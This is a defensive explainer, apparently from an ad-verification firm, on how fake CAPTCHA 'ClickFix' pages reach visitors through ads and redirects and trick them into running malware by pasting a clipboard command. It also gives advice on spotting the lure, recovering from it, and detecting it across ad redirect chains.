Someone clicks a link to stream a film, lands on the player, and a box slides over the page. It looks like the verification step everyone has clicked a thousand times: a checkbox, the familiar “I’m not a robot” wording, maybe a small grid of images.
This one is different in a way that is easy to miss in the moment. Instead of asking for a click, it asks for three keystrokes. Press the Windows key and R together. Press Ctrl and V. Press Enter. The page frames this as proof you are human. What it has actually done is copy a command to the clipboard and talk the visitor into running it.
That command tells the computer to download and run malware. The attacker never has to break in, because the page has tricked the visitor into carrying out that step on their own machine.
This is the move security researchers call ClickFix, and it has turned the most boring gesture on the web, clicking a verification box, into a delivery method for information stealers and remote access trojans.
ESET recorded the technique climbing more than 500 percent between the second half of 2024 and the first half of 2025, making it the second most common attack vector its telemetry saw after phishing.
For advertisers and ad platforms, the challenge is that attackers like to ride the same channels everyone else uses to reach an audience.
Many of these fake checks are pushed to people by abusing ad placements and the redirect chains behind them, often after a campaign has already cleared review. The creative that ran looked clean, the destination passed a first check, and the malicious instruction only surfaced several hops later.
This article follows the lure from the ad call to the keystroke, looks at what runs after the paste, and lays out where the chain can be caught before a visitor ever sees the box.
Contents
Key Takeaways
- The current fake CAPTCHA tricks the visitor into running the malware themselves, usually by pasting a copied command into the Windows Run box, so no software exploit is needed, and most automated download defenses never engage.
- The lure arrives through familiar channels: malicious ads, redirect chains off streaming and download sites, SEO-poisoned search results, and compromised legitimate pages.
- What runs is typically fileless. The pasted command launches PowerShell or mshta, pulls a payload into memory, and drops an information stealer such as Lumma or a remote access trojan, often leaving little on disk.
- The same fake check is also used for lower-stakes payouts: tricking visitors into approving browser push notifications or subscribing to premium SMS billing.
- Because the creative under review is clean and the payload appears only after several redirects, the defensible posture is to follow the full chain, re-scan continuously, and treat high-reputation domains as no safer than any other.
What the Box Is Really Asking You to Do
A normal CAPTCHA asks you to prove you are human to a server. The image grids and checkboxes are running quiet checks in the background, and the visible puzzle is mostly there to buy time and read your behavior. Nothing you do leaves the page.
The fake version works the other way around. Instead of checking you inside the page, it asks you to step out of the browser and run a command on your own computer, and that command is the attack.
The most common script reads like a verification fix. The page says automated traffic was detected and asks you to complete a manual step: press Windows key + R to open the Run dialog, press Ctrl + V to paste, then press Enter to confirm.
Between those instructions, a line of JavaScript on the page has already copied a command string to your clipboard. So when you paste, you are not pasting a verification code. You are pasting a one-line instruction that tells Windows to fetch and run a program. Pressing Enter executes it.
The genius of the framing is that every step feels like the kind of fiddly thing a real verification system might ask for.
People are trained to comply with security prompts, especially ones that borrow the visual language of Google’s reCAPTCHA or Cloudflare’s checks.
Malwarebytes notes that reCAPTCHA alone appears on more than eleven million sites, so the look is deeply familiar and rarely questioned. The attacker is not breaking into the machine. They are renting the trust the visitor already places in a checkbox.
How the Lure Reaches a Screen
A fake CAPTCHA is useless until it is in front of people, and the delivery side is where this stops being a consumer story and becomes an ad-ecosystem one. The lure travels along several routes at once.
Malicious advertising
The first is malicious advertising. Compromised or abusive ad placements redirect visitors to the fake-check page, frequently off the back of high-traffic destinations like streaming and file-download sites.
Microsoft traced one campaign in which movie-streaming sites funneled viewers through a chain of redirectors, with a single set of malicious domains drawing what it described as tens of thousands, in some cases hundreds of thousands, of unique visitors a day.
SEO poisoning
The second route is SEO poisoning, where attackers push booby-trapped pages up the search rankings for ordinary queries.
Trend Micro documented a case in which a search for the stately home tourist attraction Longleat House returned a poisoned result that led to a ClickFix page.
A straightforward compromise of legitimate sites
The third is a straightforward compromise of legitimate sites, where injected code shows the fake check to a fraction of visitors.
What ties these together for the buy side is that the malicious step lives deep in the chain. The ad creative can be clean, the first landing page can be clean, and the fake CAPTCHA only renders after one or more redirects, sometimes only for visitors who match a target profile.
A review that stops at the creative or the first URL sees nothing wrong. The same logic that lets cloaked campaigns pass moderation applies here, which is why this lure pairs naturally with the techniques covered in the Adex write-up on ad cloaking. The redirect-chain abuse that carries these pages is the same pattern flagged in the Adex report on malicious redirects detected in ad campaigns.
Why Three Keystrokes Defeat So Many Defenses
Most malware delivery has to get past something. A drive-by download fights the browser’s download warnings and the antivirus scanner. An email attachment fights the mail gateway and the user’s caution about opening files. ClickFix sidesteps the whole category by routing the dangerous step through an action that looks ordinary, so the defenses built to block it never engage.
When a command is pasted into the Run dialog, Windows treats it as something the account holder deliberately typed. There is no download prompt to dismiss, no file to mark as untrusted, no macro warning.
The Federal Trade Commission describes the sequence plainly in its consumer alert, walking through the same Windows-R, Ctrl-V, Enter steps and warning people not to follow verification prompts that ask them to run anything.
The clipboard hijack is what makes it seamless.
The instruction is framed as a routine verification fix, and the visitor following it has no reason to expect the keystrokes will launch a program. The visitor never sees the command they are about to run, because copying it is invisible, and the Run box shows only a short string that scrolls out of view.
The instruction also tends to use tools that already ship with the operating system. Instead of dropping a new executable, the pasted line invokes PowerShell or mshta, both signed Microsoft utilities, to do the fetching. Defenders call these living-off-the-land binaries, and their presence is unremarkable on any Windows machine, so their sudden use raises fewer flags than an unknown program would.
What Runs After the Paste
The pasted command is rarely the malware itself. It is a launcher. Its job is to reach out, pull down the real payload, and run it with as little trace as possible.
In the cases Trend Micro analyzed, the launcher kicked off a multistage sequence: an initial script retrieved an obfuscated payload, often hidden inside an ordinary-looking file such as an MP3 or a PDF hosted on a legitimate file-sharing service, then executed it in memory through mshta or PowerShell without writing the final program to disk.
Hosting the intermediate stages on trusted platforms helps the traffic blend in, a pattern that echoes the Adex analysis of the abuse of trusted domains. Because so much of this happens in memory, scanners that watch for suspicious files on disk have little to catch.
The payload at the end is usually built to monetize the machine fast. Information stealers dominate, and Lumma Stealer has been the most prolific of them, harvesting saved passwords, browser cookies, autofill data, and cryptocurrency wallet details.
The same delivery method has been seen dropping Rhadamanthys and other stealers, along with remote access trojans such as AsyncRAT, XWorm, and NetSupport, and loaders like Latrodectus that pull in whatever comes next. The technique is not confined to Windows either.
Researchers have observed macOS variants steering visitors toward terminal commands that install the Atomic stealer. The throughline is speed and quiet: get credentials and session tokens off the machine before anyone notices, using tools that leave little behind.
The Quieter Payouts: Fake Push Notifications and Premium Billing
Not every fake check is reaching for a stealer. The same template is profitable at lower stakes, and these variants matter for the ad world because they monetize through legitimate-looking channels rather than outright malware.
One version uses the fake CAPTCHA to harvest a browser push notification subscription. The “verify” button is wired to the browser’s own permission prompt, so clicking what looks like a human check actually grants the site permission to send notifications.
From then on, the deceived visitor receives a stream of pushed ads and scam alerts straight to the desktop, well after they have left the page.
Malwarebytes documents this clipboard-and-permission pattern in detail, including a tutorial video variant where the page embeds a short clip showing the visitor exactly which keys to press.
Another version routes the visitor into a premium SMS or subscription billing flow, where completing the “verification” signs them up for a recurring charge. These do not infect the machine, which is part of why they survive. They look like ordinary opt-ins, and the harm shows up later on a phone bill or as an unrelenting notification feed.
The thing being abused here is consent, not the format. A push subscription a person genuinely opts into is a normal, useful channel. The fake check forges that opt-in, capturing a subscription the visitor never meant to give. For a platform, that is the line worth watching: a placement does not have to deliver code to harm the experience, and a redirect that tricks someone into a subscription they did not choose traces back to the ad that started it just as a malware page would.
Spotting It Before the Paste
The single most useful rule is the one the FTC leads with: a real CAPTCHA never asks you to open a program, press Windows-R, or paste anything. Verification happens inside the page. The moment a “human check” gives you a task to perform elsewhere on your computer, the check is the attack. Anyone who manages a household or a team can pass that one line along and prevent most of these infections outright.
A few more signals help.
Legitimate verification does not require keyboard shortcuts that open system dialogs, so any prompt mentioning the Run box, the Terminal, or PowerShell is disqualifying on its face. The pages often spoof familiar brands in their domain names while sitting on URLs that do not match the service they imitate, so the address bar is worth a glance before acting. And because the command is hidden on the clipboard, a careful user who pastes into a text editor instead of the Run box will see a long, unfamiliar instruction rather than a short code, which is itself the answer.
On the recovery side, anyone who has already run one of these should assume saved credentials and session cookies were taken: disconnect, run a full scan, and change passwords from a different device, starting with email and banking.
Where Detection Sits in the Ad Chain
For users, defense is a habit. For the ad ecosystem, it is an inspection problem, and it lands on the same ground as other post-click abuse. The malicious page rarely sits in the creative or on the first destination. It usually lives several redirects downstream, shown only to a slice of visitors and often switched on after the campaign clears review.
That shape dictates the response. A scan that reads the ad tag and stops never reaches the fake-check page, so detection has to follow the redirect chain the whole way, the way a real visitor’s browser would, and render what actually appears at the end.
Since the payload can be switched on after approval, a single check at submission is not enough, and continuous re-scanning closes the window that timing attacks rely on. And because the lure rides on high-traffic, reputable destinations, reputation is a weak filter on its own, so the same scrutiny has to apply to trusted domains.
Adex applies validation across the chain that flags redirect behavior and destination content rather than trusting the creative alone, which is the layer where a fake CAPTCHA served three hops past a clean ad becomes visible.
The broader pattern, and how it has shown up across recent campaigns, runs through the Adex roundup of the biggest malware scandals of 2025.
The Shape of the Problem
Fake CAPTCHA scams work because they borrow two kinds of trust at once. They borrow the visitor’s trust in a checkbox they have clicked countless times, and they borrow the ad chain’s tendency to judge a campaign by its creative.
The first is a habit that a single clear rule can break: real verification never asks you to run a command. The second is structural, and it does not get solved at the moment of approval. A clean creative, and a clean first page tell you almost nothing about what a real visitor reaches three redirects later. Closing the gap means inspecting the whole path, rendering the destination as a browser would, and re-checking after a campaign goes live, so that a verification box asking for three keystrokes is caught as what it is before it reaches a screen.
FAQ
Is the fake CAPTCHA itself the malware?
No. The page is the lure. The harm comes from the command it copies to your clipboard and persuades you to run. The page can sit on an otherwise ordinary site and does nothing until you follow the keystroke instructions, which is why the advice to never run anything a CAPTCHA asks for is the whole defense for most people.
Why does pasting a command work when downloading a file would get blocked?
Because the operating system treats a command you paste into the Run dialog as a deliberate action by the account holder. There is no download warning and no untrusted-file flag, and the command usually calls built-in Windows tools like PowerShell, so it looks routine. The attacker gets the user to perform the step that security software is designed to intercept.
How does an ad lead to one of these pages if the creative was approved?
The malicious page is normally several redirects past the ad and may appear only for certain visitors or only after the campaign has cleared review. A check that examines the creative or the first landing page can pass it, while the fake CAPTCHA waits further down the chain. Catching it means following the redirects to the final rendered page rather than trusting the approved creative.
What should someone do if they have already pasted and run the command?
Treat the machine as compromised. Disconnect it from the network, run a full security scan, and change passwords from a different device, prioritizing email, banking, and any account with saved logins, since stealers target browser-stored credentials and session cookies first. Enabling multifactor authentication where it is not already on helps limit the reuse of stolen passwords.
Are Macs and phones affected, or just Windows?
Windows is the main target because the Run dialog makes the trick smooth, but researchers have observed macOS versions that steer visitors toward Terminal commands installing the Atomic stealer. The defining behavior is the same on any system: a verification prompt that asks you to run a command somewhere outside the page is the attack, regardless of the operating system.